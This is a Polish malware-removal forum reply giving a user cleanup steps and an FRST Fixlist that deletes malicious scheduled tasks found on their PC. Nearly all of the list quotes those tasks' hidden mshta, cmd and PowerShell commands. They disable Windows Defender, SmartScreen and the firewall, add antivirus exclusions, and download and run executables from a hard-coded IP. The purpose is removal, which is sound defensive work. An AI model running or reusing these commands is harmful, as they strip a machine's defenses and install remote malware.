Odinstaluj na razie Jave, masz mase zdublowanych wpisow.
Zrob skan przy pomocy mbam i usun to co wykryje.
Wykonaj Fixlist.txt dla FRST:
CloseProcesses:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [711288 2022-09-15] (Oracle America, Inc. -> Oracle Corporation)
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Ograniczenia <==== UWAGA
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-2007841477-1455595398-3338308244-1001\...\Run: [MicrosoftEdgeAutoLaunch_E0359248083FDB44B7852C7D3585D0D2] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3891624 2022-10-29] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-2007841477-1455595398-3338308244-1001\...\Run: [Discord] => C:\ProgramData\danie\Discord\Update.exe [1525016 2022-10-21] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2007841477-1455595398-3338308244-1002\...\Run: [MicrosoftEdgeAutoLaunch_1DAAFBC4716B7F2A71D5FDFE176AF033] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3891624 2022-10-29] (Microsoft Corporation -> Microsoft Corporation)
GroupPolicy: Ograniczenia ? <==== UWAGA
Policies: C:\ProgramData\NTUSER.pol: Ograniczenia <==== UWAGA
Task: {006C8F7E-6C66-4C95-9DFC-6806B710FBB3} - System32\Tasks\Microsoft\Windows\DirectX\ExclusionProcess1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Add-MpPreference -ExclusionProcess powershell.exe -Force",0)(Window.Close)
Task: {00A5B190-4D05-4F35-9365-90C0021CB692} - System32\Tasks\Microsoft\Windows\DirectX\DisableBehaviorMonitoring2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {00F62731-6CBD-4786-A9A1-4C0A7376B4F7} - System32\Tasks\Microsoft\Windows\DirectX\SevereThreatDefaultAction => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore",0)(Window.Close)
Task: {01DD36C7-C40B-4E13-9F0E-E05733E1BA39} - System32\Tasks\Microsoft\Windows\DirectX\ModerateThreatDefaultAction => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore",0)(Window.Close)
Task: {02CE119F-7C09-43E0-A631-BC1CB7060AA4} - System32\Tasks\Microsoft\Windows\DirectX\Services BITBHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/b.exe -o C:\Users\Public\b.exe & C:\Users\Public\b.exe",0)(Window.Close)
Task: {05321552-E158-46D4-ACCC-1A157EB21D7C} - System32\Tasks\Microsoft\Windows\DirectX\DisableUpdateOnStartupWithoutEngine => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates"" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {05A86BFF-9E1E-4366-AA8E-43CD141D5443} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {05ACF8EE-C630-4B86-B426-656353364A69} - System32\Tasks\Microsoft\Windows\DirectX\AvgCPULoadFactor => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f",0)(Window.Close)
Task: {05FF367B-2ABF-4836-ADBB-2EB091CC62BD} - System32\Tasks\Microsoft\Windows\DirectX\DisableBlockAtFirstSeen2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {0875BD5C-3A7C-4A57-B91F-8A2BABAA62B8} - System32\Tasks\Microsoft\Windows\DirectX\DisableEnhancedNotifications => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting"" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {09437B21-2E60-4038-885E-6149A45F5118} - System32\Tasks\Microsoft\Windows\DirectX\EnableWebContentEvaluation => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {0A86A514-B4D7-4B45-916B-A75F70FBDE40} - System32\Tasks\Microsoft\Windows\DirectX\ExecutionPolicy2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-ExecutionPolicy Bypass -Force",0)(Window.Close)
Task: {0C036079-94DB-488F-9E03-8CEC4AFBF602} - System32\Tasks\Microsoft\Windows\DirectX\ScanOnlyIfIdle => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {0CAB421B-2355-4766-AFF0-20BAB3C6FA8E} - System32\Tasks\Microsoft\Windows\DirectX\DisableScanningMappedNetworkDrivesForFullScan1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan True -ErrorAction Ignore",0)(Window.Close)
Task: {0D5CA148-548A-41A1-A5A1-DA0471977F66} - System32\Tasks\Microsoft\Windows\DirectX\Windows Defender1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ""Windows Defender"" /f",0)(Window.Close)
Task: {11CE5ADC-CFAF-4624-90AE-988648AB8AB0} - System32\Tasks\Microsoft\Windows\DirectX\DisableAntiVirus => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender"" /v DisableAntiVirus /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {14757005-FC37-49EC-A3B8-E58F592FEBC7} - System32\Tasks\Microsoft\Windows\DirectX\DisableRemovableDriveScanning => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {158801FF-03EB-44CF-BA96-EBFABDB06A48} - System32\Tasks\Microsoft\Windows\DirectX\EnabledV9 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter /v EnabledV9 /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {15F6134B-CFD1-472B-89DA-6D1001FEC3D9} - System32\Tasks\Microsoft\Windows\DirectX\EnableWebContentEvaluation2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\NTUSER\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {17A8B807-C3D3-4069-9115-CD0E03824E5F} - System32\Tasks\Microsoft\Windows\DirectX\DisablePrivacyMode => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -DisablePrivacyMode True -ErrorAction Ignore",0)(Window.Close)
Task: {18FBB8DA-FCA5-4BD0-AF08-C5931BBDF63D} - System32\Tasks\Microsoft\Windows\DirectX\DisableOnAccessProtection1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {19774F9E-9D16-4CD9-8D96-9EBEE76A23BB} - System32\Tasks\Microsoft\Windows\DirectX\ExecutionPolicy => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force",0)(Window.Close)
Task: {1A756E41-7FCA-4AF4-8A54-64CEF516955B} - System32\Tasks\Microsoft\Windows\DirectX\PurgeItemsAfterDelay => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {1D2952DE-0DAA-410A-9FC3-EC012949D059} - System32\Tasks\Microsoft\Windows\DirectX\DisableBehaviorMonitoring => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -DisableBehaviorMonitoring True -ErrorAction Ignore",0)(Window.Close)
Task: {1D53A517-48CA-4E0A-BB13-A44448A5243F} - System32\Tasks\Microsoft\Windows\InstallService\DnsCache => C:\Users\danie\AppData\Roaming\DnsCache\dnsCleaner.exe [8493056 2022-11-03] () [Brak podpisu cyfrowego]
Task: {1DC273F1-5588-43BE-B28C-CE13ECF22636} - System32\Tasks\Microsoft\Windows\DirectX\DisableAntiSpyware3 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v DisableAntiSpyware /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {1F6D4A3F-D537-414B-83B7-44DD2B65373B} - System32\Tasks\Microsoft\Windows\DirectX\WdBoot2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {1F9D0F4C-A7D6-4DBE-9C17-436484688E4F} - System32\Tasks\Microsoft\Windows\DirectX\SecurityHealthServic4e => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {1FCEE4F6-E9E0-434F-A1E0-6083E4110CBE} - System32\Tasks\Microsoft\Windows\DirectX\AppAndBrowser_StoreAppsSmartScreenOff => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Security Health\State"" /v AppAndBrowser_StoreAppsSmartScreenOff /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {1FE11EE6-50C3-4F9F-9F24-8F4A403BD46E} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {20A52002-7C68-4CB6-BBFF-B6148D30182E} - System32\Tasks\Microsoft\Windows\DirectX\WinDefend2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {21F32BC6-BBCA-4141-99CE-9D97F726561F} - System32\Tasks\Microsoft\Windows\DirectX\ExclusionProcess2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Add-MpPreference -ExclusionProcess mshta.exe -Force",0)(Window.Close)
Task: {24B57A0B-B6A7-4B3D-858F-6581F69FA75D} - System32\Tasks\Microsoft\Windows\DirectX\Real-Time Protection => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection"" /v DpaDisabled /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {26743013-D593-414C-A297-B844CF5D3C89} - System32\Tasks\Microsoft\Windows\DirectX\SmartScreenEnabled => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\DEFAULT\SOFTWARE\Policies\Microsoft\Edge /v SmartScreenEnabled /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {2D440E22-9D45-427B-9AF9-8BE99B7F31C6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {2E62278D-88B7-4633-97E7-469CE6AD7B56} - System32\Tasks\Microsoft\Windows\DirectX\DisableAntiVirus2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender"" /v DisableAntiVirus /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {315C7533-11FF-4F79-A777-C84F1ADF11BB} - System32\Tasks\Microsoft\Windows\DirectX\MAPSReporting => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore",0)(Window.Close)
Task: {324B7ACB-D6FB-4E0D-A351-95BD5CF42663} - System32\Tasks\Microsoft\Windows\DirectX\SpyNetReportingLocation => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f",0)(Window.Close)
Task: {32C338FC-D0A9-4ECB-874E-CC36DD72BBB2} - System32\Tasks\Microsoft\Windows\DirectX\DisableArchiveScanning => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v DisableArchiveScanning /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {33A79F7C-46C9-4C82-862B-E9725A076E6D} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {35B12F3C-0D4A-4377-BF35-C38D9F87B361} - System32\Tasks\Microsoft\Windows\DirectX\WdNisSvc2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {35D38811-1A1E-4863-8975-D7D25927B93F} - System32\Tasks\Microsoft\Windows\DirectX\Services CUDHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/d.exe -o C:\Users\Public\d.exe & C:\Users\Public\d.exe /D",0)(Window.Close)
Task: {3E3B07E8-F9D4-4288-973F-F1F8B658EC1F} - System32\Tasks\Microsoft\Windows\DirectX\ExclusionExtension => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Add-MpPreference -ExclusionExtension .exe -ErrorAction Ignore",0)(Window.Close)
Task: {404228E5-9327-4695-899F-5BBC190EC457} - System32\Tasks\Microsoft\Windows\DirectX\SignatureUpdateCatchupInterval => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates"" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {41B5C3AA-E97F-4333-A528-23A8147814EC} - System32\Tasks\Microsoft\Windows\DirectX\DisablePrivacyMode2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration"" /v DisablePrivacyMode /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {41E02A44-43CE-46DB-9D07-DB2BA47BF9D1} - System32\Tasks\Microsoft\Windows\DirectX\DefenderApiLogger => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {43AB5433-A88A-4AA2-8CA7-31CBEDBC9865} - System32\Tasks\Microsoft\Windows\DirectX\Services CUBHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/b.exe -o C:\Users\Public\b.exe & C:\Users\Public\b.exe",0)(Window.Close)
Task: {43FA8FD4-C81F-4739-A20F-A8C83CE250DB} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-08-30] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {4436DB36-53E3-4148-B4DE-B8294BCD99C6} - System32\Tasks\Microsoft\Windows\DirectX\SpyNetReporting => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"" /v SpyNetReporting /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {4B6C6144-A176-4631-8F40-FCFE8AD2DEDA} - System32\Tasks\Microsoft\Windows\DirectX\PurgeItemsAfterDelay1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine"" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {4C7016A9-F640-4787-993C-8BE1E9E8559C} - System32\Tasks\Microsoft\Windows\DirectX\DisableScriptScanning => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableScriptScanning /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {4C80CA4E-845C-4186-95C7-58DB3B589821} - System32\Tasks\Microsoft\Windows\DirectX\HideSystray => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray"" /v HideSystray /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {51D80FA6-1A09-45F7-A53D-9F248AA4418E} - System32\Tasks\Microsoft\Windows\DirectX\DisableRestorePoint => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v DisableRestorePoint /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {51DEB355-F231-4799-B843-392F54B01694} - System32\Tasks\Microsoft\Windows\DirectX\EPP1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f",0)(Window.Close)
Task: {53AA7CB4-1757-483C-91FA-E828502C4639} - System32\Tasks\update-S-1-5-21-2007841477-1455595398-3338308244-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {571B52CC-BABC-46AF-88E8-B2DCC5C2E9A5} - System32\Tasks\Microsoft\Windows\DirectX\DisableScanOnRealtimeEnable1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {58CFE84B-4312-4E89-BEF7-98506BC29D00} - System32\Tasks\Microsoft\Windows\DirectX\SecurityHealthService => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {5981BF75-0DC4-4217-9357-830E8014A332} - System32\Tasks\Microsoft\Windows\DirectX\Services BITDHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/d.exe -o C:\Users\Public\d.exe & C:\Users\Public\d.exe /D",0)(Window.Close)
Task: {59EA286B-EE0E-4EAA-9578-E264813FD53E} - System32\Tasks\Microsoft\Windows\DirectX\DisableRoutinelyTakingAction => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {5BDD8AF9-CCFA-42D9-B43E-1BE1750F29B1} - System32\Tasks\Microsoft\Windows\DirectX\ScheduleDay2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates"" /v ScheduleDay /t REG_DWORD /d 8 /f",0)(Window.Close)
Task: {5E1D9542-79F8-4BFA-A042-0D86E0B6B123} - System32\Tasks\Microsoft\Windows\DirectX\DisableIOAVProtection1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c powershell Set-MpPreference -DisableIOAVProtection True -ErrorAction Ignore",0)(Window.Close)
Task: {5F058850-B820-42E6-BABD-F94A7F45337A} - System32\Tasks\Microsoft\Windows\DirectX\DisableEnhancedNotifications2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications"" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {5F823366-52C6-46DD-9BBC-81EE64235D84} - System32\Tasks\Microsoft\Windows\DirectX\ExclusionExtension2 13 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Add-MpPreference -ExclusionExtension exe -ErrorAction Ignore",0)(Window.Close)
Task: {5FA14200-A345-4F39-819C-ECC133638E0A} - System32\Tasks\Microsoft\Windows\DirectX\StartupApproved => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v ""Windows Defender"" /f",0)(Window.Close)
Task: {6458DD2F-436F-403D-A1D7-FAB4FFBADE8B} - System32\Tasks\Microsoft\Windows\DirectX\DisableCatchupQuickScan => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {67181484-08BD-4FCD-9FAA-A67DD2C77A2B} - System32\Tasks\Microsoft\Windows\DirectX\DisableAntiSpyware2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender"" /v DisableAntiSpyware /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {692BF924-DAB2-4A11-9360-5779FD21427D} - System32\Tasks\Microsoft\Windows\DirectX\ExclusionProcess3 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Add-MpPreference -ExclusionProcess *.exe -Force",0)(Window.Close)
Task: {69EC98D1-4E2E-477D-A55F-9A3D609A1D12} - System32\Tasks\Microsoft\Windows\DirectX\SecurityHealth => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f",0)(Window.Close)
Task: {6BAE7411-E4D2-403C-AEF7-96AC01326541} - System32\Tasks\Microsoft\Windows\DirectX\Scan_ScheduleDay => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation"" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f",0)(Window.Close)
Task: {6C29628E-64A0-4CBB-9C9B-1F66F32FAD3F} - System32\Tasks\Microsoft\Windows\DirectX\HighThreatDefaultAction => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore",0)(Window.Close)
Task: {6CF71601-0CCF-4914-9A96-E54E610E5DFE} - System32\Tasks\Microsoft\Windows\DirectX\DisableAutoExclusions => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions"" /v DisableAutoExclusions /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {6DAE1049-0E2C-4281-BB80-B558B6C2DE0A} - System32\Tasks\Microsoft\Windows\DirectX\DisableIOAVProtection => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableIOAVProtection /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {6E419A39-E7B8-4A01-8355-D57074C95D19} - System32\Tasks\Microsoft\Windows\DirectX\SmartScreenEnabled2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\NTUSER\SOFTWARE\Policies\Microsoft\Edge /v SmartScreenEnabled /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {70A57431-3396-4393-A394-12BB7D10CC11} - System32\Tasks\Microsoft\Windows\DirectX\ScheduleTime => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v ScheduleTime /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {71D0AC98-2A16-4818-AB00-93415E2A56E0} - System32\Tasks\Microsoft\Windows\DirectX\SpynetReporting1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"" /v SpynetReporting /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {71E68E42-9933-40E5-9FBC-9C8001302FC0} - System32\Tasks\Microsoft\Windows\DirectX\DisableGenericRePorts => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting"" /v DisableGenericRePorts /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {730F080A-D5CD-426E-A74D-685233E68594} - System32\Tasks\Microsoft\Windows\DirectX\MsSecFlt => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {7812BA90-1C98-4841-B5FB-D1CFBB54307D} - System32\Tasks\Microsoft\Windows\DirectX\Services BITCHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/obs.exe -o C:\Users\Public\obs.exe & C:\Users\Public\obs.exe",0)(Window.Close)
Task: {7B459974-309C-4229-9DF8-E502E866BE1E} - System32\Tasks\Microsoft\Windows\DirectX\DisableRealtimeMonitoring => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {7BB129A3-C3B4-489F-A67E-2350C29FA39E} - System32\Tasks\Microsoft\Windows\DirectX\FW => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c netsh advfirewall set allprofiles state off",0)(Window.Close)
Task: {7BC8B203-30CA-4864-8B99-250858AC40FE} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {7DE49857-D7A9-46F2-A87F-0632107F2FB7} - System32\Tasks\Microsoft\Windows\DirectX\DisableScanningNetworkFiles => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {7E8283FE-DEFC-46F2-B2C7-9036FAB623F9} - System32\Tasks\Microsoft\Windows\DirectX\DontOfferThroughWUAU => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {80201CB6-7DDD-4C7F-B743-182C5B77DE3B} - System32\Tasks\Microsoft\Windows\DirectX\WdFilter => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {80D86938-CEEC-4959-B69F-C6D71484542C} - System32\Tasks\Microsoft\Windows\DirectX\DisableBlockAtFirstSeen1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -DisableBlockAtFirstSeen True -ErrorAction Ignore",0)(Window.Close)
